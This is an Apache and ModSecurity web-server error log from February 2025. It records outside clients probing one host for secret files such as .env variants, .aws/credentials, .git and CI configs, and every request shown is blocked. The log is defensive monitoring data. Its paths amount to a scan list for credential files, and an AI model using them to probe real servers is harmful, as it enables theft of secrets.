[Sun Feb 02 01:51:03.114673 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z57Bd48QlVt4jagukqXL2AAAAAI"]
[Sun Feb 02 01:51:03.466970 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z57Bd48QlVt4jagukqXL2gAAAAI"]
[Sun Feb 02 01:51:03.467269 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z57Bd48QlVt4jagukqXL2gAAAAI"]
[Sun Feb 02 01:51:03.467574 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z57Bd48QlVt4jagukqXL2gAAAAI"]
[Sun Feb 02 01:51:03.602440 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/azure-pipelines
[Sun Feb 02 01:51:03.745936 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "Z57Bd48QlVt4jagukqXL3QAAAAI"]
[Sun Feb 02 01:51:03.746437 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "Z57Bd48QlVt4jagukqXL3QAAAAI"]
[Sun Feb 02 01:51:03.746887 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "Z57Bd48QlVt4jagukqXL3QAAAAI"]
[Sun Feb 02 01:51:03.779409 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.azure-pipelines
[Sun Feb 02 01:51:03.924339 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.environment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "Z57Bd48QlVt4jagukqXL4AAAAAI"]
[Sun Feb 02 01:51:03.924605 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "Z57Bd48QlVt4jagukqXL4AAAAAI"]
[Sun Feb 02 01:51:03.924937 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "Z57Bd48QlVt4jagukqXL4AAAAAI"]
[Sun Feb 02 01:51:03.999182 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/azuredevops
[Sun Feb 02 01:51:04.109076 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vsts
[Sun Feb 02 01:51:04.297076 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.vsts
[Sun Feb 02 01:51:04.493439 2025] [authz_core:error] [pid 879503] [client 18.170.2.62:49703] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tfs
[Mon Feb 03 17:16:39.790196 2025] [:error] [pid 904757] [client 95.111.244.79:56568] [client 95.111.244.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6Dr54J3E9vJ82uNaLq9JQAAAAE"]
[Mon Feb 03 17:16:39.791844 2025] [:error] [pid 904757] [client 95.111.244.79:56568] [client 95.111.244.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6Dr54J3E9vJ82uNaLq9JQAAAAE"]
[Mon Feb 03 17:16:39.792280 2025] [:error] [pid 904757] [client 95.111.244.79:56568] [client 95.111.244.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6Dr54J3E9vJ82uNaLq9JQAAAAE"]
[Mon Feb 03 17:53:55.863747 2025] [authz_core:error] [pid 903226] [client 34.219.159.38:53200] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Feb 03 23:55:24.636963 2025] [authz_core:error] [pid 904739] [client 18.170.2.62:53169] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Feb 07 01:14:25.335610 2025] [authz_core:error] [pid 987990] [client 103.102.230.8:53104] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Feb 07 02:02:46.717492 2025] [authz_core:error] [pid 987201] [client 103.102.230.8:38676] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Feb 12 09:51:42.603777 2025] [authz_core:error] [pid 1098793] [client 54.84.249.63:39980] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Feb 14 17:21:47.455578 2025] [authz_core:error] [pid 1151897] [client 89.248.163.4:60486] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Feb 15 03:06:00.359809 2025] [authz_core:error] [pid 1161772] [client 13.58.228.70:46446] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Feb 15 03:06:00.369916 2025] [authz_core:error] [pid 1161774] [client 13.58.228.70:46454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Feb 15 03:06:04.366364 2025] [authz_core:error] [pid 1161778] [client 13.58.228.70:46458] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Feb 19 06:29:42.886597 2025] [authz_core:error] [pid 1258386] [client 193.41.206.36:39348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Wed Feb 19 06:29:46.030711 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 19 06:29:46.510201 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 19 06:29:46.588079 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:46.613579 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:47.570620 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Wed Feb 19 06:29:47.646347 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Feb 19 06:29:47.672268 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:47.924750 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:47.952074 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:47.978087 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 19 06:29:48.004609 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Wed Feb 19 06:29:48.189113 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Wed Feb 19 06:29:48.215813 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 19 06:29:48.241967 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Wed Feb 19 06:29:48.280891 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Wed Feb 19 06:29:48.459045 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VsTMO0jkjfdQXx8it7-gAAAAg"]
[Wed Feb 19 06:29:48.459359 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VsTMO0jkjfdQXx8it7-gAAAAg"]
[Wed Feb 19 06:29:48.459633 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z7VsTMO0jkjfdQXx8it7-gAAAAg"]
[Wed Feb 19 06:29:48.553541 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Wed Feb 19 06:29:48.879939 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config]"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config]"] [unique_id "Z7VsTMO0jkjfdQXx8it8AwAAAAg"]
[Wed Feb 19 06:29:48.880199 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config]"] [unique_id "Z7VsTMO0jkjfdQXx8it8AwAAAAg"]
[Wed Feb 19 06:29:48.880516 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config]"] [unique_id "Z7VsTMO0jkjfdQXx8it8AwAAAAg"]
[Wed Feb 19 06:29:48.906962 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BAAAAAg"]
[Wed Feb 19 06:29:48.907346 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BAAAAAg"]
[Wed Feb 19 06:29:48.907813 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BAAAAAg"]
[Wed Feb 19 06:29:48.933986 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BQAAAAg"]
[Wed Feb 19 06:29:48.934508 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BQAAAAg"]
[Wed Feb 19 06:29:48.935034 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BQAAAAg"]
[Wed Feb 19 06:29:48.961264 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BgAAAAg"]
[Wed Feb 19 06:29:48.961652 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BgAAAAg"]
[Wed Feb 19 06:29:48.962110 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BgAAAAg"]
[Wed Feb 19 06:29:48.988733 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BwAAAAg"]
[Wed Feb 19 06:29:48.989121 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BwAAAAg"]
[Wed Feb 19 06:29:48.989578 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VsTMO0jkjfdQXx8it8BwAAAAg"]
[Wed Feb 19 06:29:49.028958 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CAAAAAg"]
[Wed Feb 19 06:29:49.029351 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CAAAAAg"]
